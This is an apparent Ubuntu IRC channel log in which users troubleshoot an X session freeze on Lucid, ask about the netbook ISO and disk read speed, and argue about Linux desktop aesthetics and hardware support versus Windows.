Dimmuxxjoaopinto_: while x is freezed?23:34
joaopinto_Dimmuxx, no, after that23:34
Oxymoronchorse: I cannot found any unofficial contact information, jsut some phone numbers and mails to their main company xD23:35
joaopinto_Dimmuxx, or check the Xorg logs23:35
Oxymoronbjsnider: Yes, its a java app ;)23:35
bjsniderthat's why it's ugly23:35
Oxymoronbjsnider: It looks exactly the same as the isntaller Zend Studio, Aptana and themselves have xD23:35
bjsniderall java apps look like the picture of dorian gray23:35
Oxymoronbjsnider: Isnt it possible to create your own interface and GUI even if you use Java?23:36
Dimmuxxjoaopinto_: nothing interesting in the log23:36
joaopinto_Dimmuxx, no segfault ? you need to check the old logs23:36
bjsniderthey could create a gtk gui23:36
bjsnideror a qt gui23:36
Oxymoronbjsnider: Then I must say, why does ALL computers use grey as default color? :S Grey is the most depressing color in the world.23:36
Oxymoronbjsnider: Yeah, gtk or qt would be nice. Do you know what kind Eclipse and Zend Studio uses?23:37
bjsniderubuntu uses purple23:37
Oxymoronbjsnider: Yeah, purple is nice :)23:37
Dimmuxxjoaopinto_: you mean Xorg.0.log in /var/log right?23:37
bjsniderprince thinks so23:37
Oxymoronbjsnider: Everywhere I just see grey areas and it annoys me and make me more depressed then I am already.23:38
bjsnidermaybe you should go into therapy23:38
DimmuxxI could still move the mousepointer in X but couldn't click on anything, it was possible to start a new gnome-terminal via alt+f223:38
Dimmuxxso maybe it wasn't a real X freeze :P23:38
Oxymoronbjsnider: I am in teraphy already ... still depressed xD23:38
Oxymoronbjsnider: No not depressed like that, but a little bit down.23:39
joaopinto_Dimmuxx, I mean .old or .1, .0 is probably the one from your working boot :23:39
Dimmuxxit have happend once on both my lucid computers but like a month apart so it's not somehing new23:39
DimmuxxI didn't restart23:39
joaopinto_Dimmuxx, it was not a real freeze23:39
Dimmuxxjust killed X23:39
joaopinto_it's most like a windows manager issue23:40
Oxymoronbjsnider: When I look on a iPhone or Android interface I always get happy but when I start my computer Its black and grey colors all over it ... Why not use colorful happy colors on most milky and white areas? :S23:40
joaopinto_Dimmuxx, oh, 1 month is too long, update and check if it happens again23:40
OxymoronYou dont need eye candy to make things look good.23:40
Dimmuxxyeah tried to kill nautilus and gnome-panel but that wasn't enough23:40
Dimmuxxit just freezed on this computer23:40
Dimmuxxsame thing happend on my other lucid computer a month ago23:40
Dimmuxxso the bug isn't new23:41
Oxymoronbjsnider: Ubuntu and Kubuntu especially finally have take a step forward with the new themes, fonts and logos its good but I dont understand why nobody have understand that until now? :S23:41
DimmuxxWhen my other computer crashed a month ago I thought it was just because gnome weren't final yet but it should be final now but it seems that that bug remains :P23:43
bjsniderOxymoron, maybe they had more important things to think about, such as broken software and unsupported hardware?23:45
DinkOther than the netbook gui are there any other tweaks in the netbook iso ? ie kernel minimal packages etc ?23:47
Oxymoronbjsnider: Yes, but IF I were the ground owner Linus Torvalds I would have provided a good GUI base from the beginning. I dont expect it to be perfect from the beginning but a quite nice default easy and clean happy interface GUI that all apps uses if they havent other graphic render protocols like gtk or QT23:49
DinkBasically would like to have a materialistic version. Would it be better to use the lucid alt iso and install cli then install the netbook-remix package ?23:49
bjsniderlinus has nothing to do with any gui, he only deals with the kernel23:50
Oxymoronbjsnider: As far as I have understand, the real "issue" that people arent convinced about GNU/Linux before Windows or Apple is because of the user friendly lackyness of interfaces.23:50
Oxymoronbjsnider: I just took him as an example ;)23:50
bjsniderthe person you should be focusing on is mark shuttleworth23:50
OxymoronCO-owner of canoncial then.23:51
bjsniderhe's the only reason ubuntu doesn't look like windows 2000 -- like fedora does23:51
OxymoronI dont see much difference between ubuntu and Windows in that case but yeah sure.23:52
bjsnidersuse looks good with their "sonar" theme23:52
Oxymoron10.04 is one step in right direction anyway, and I am really glad to see the progress coming this far.23:52
bjsnideri don't think windows and osx look particularly good23:53
bjsniderbut it's all subjective23:53
OxymoronI have been waiting several years to migrate completely from Windows to GNU/Linux and/or *buntu dist.23:53
bjsniderwhy wait?23:53
Oxymoronbjsnider: I dont think WIndows or Apple OS look good either23:53
Oxymoronbjsnider: BEcause *buntu cannot provide me with enough stableness and wide support for things I need YET but soon.23:54
bjsniderwhat? ridiculous23:54
OxymoronNow with plymouth, gfxboot in grub2, better KDM/GDM, better polished and wide featured desktop environments and hopefully better apps as well this is going to be far better than WIndows or Apple OS.23:55
bjsniderthere's not a single thing you can say you need windows or osx for that i cannot point to an alternative for23:56
Oxymoronbjsnider: Look on wireless devices, webcam, IM-clients, browsers, some core errors to fix in temrinal (Not good for new users) and so on.23:56
bjsniderand forget this "stable" crap. you can run linux for years without rebooting23:56
Oxymoronstable is not always about freezeing and that kind of things like servers need to be without.23:57
OxymoronIf we just talking about GNU/Linux perfomance stableness, then yes its rock solid.23:57
bjsniderany d-link wifi device is supported immediately23:57
bjsniderthe webcams i've used are supported23:58
bjsniderall browsers, i mean i don't even know what you're saying right now23:58
duffydackwebcam and Im clients are fixed by using xmpp..  cant blame linux (even tho emesene does a good job but not perfect) for A/V chat23:58
OxymoronDV cams doesnt work, wifi support wasnt supported before, I had to manually install ndiswrapper myself and so on.23:58
bjsniderfor what wifi device?23:58
OxymoronAny wifi device that used WPA encryption. I think *buntu was in v8.04 in that time.23:59
bjsnideryou're out of date23:59
bjsniderwpa works fine23:59
btakitaHello, I'm having trouble diagnosing slow cached disk reads, using hdparm -T23:59
* duffydack gots wifi and wpa2.23:59
Oxymoronbjsnider: NOW it works fine ... but not THEN23:59

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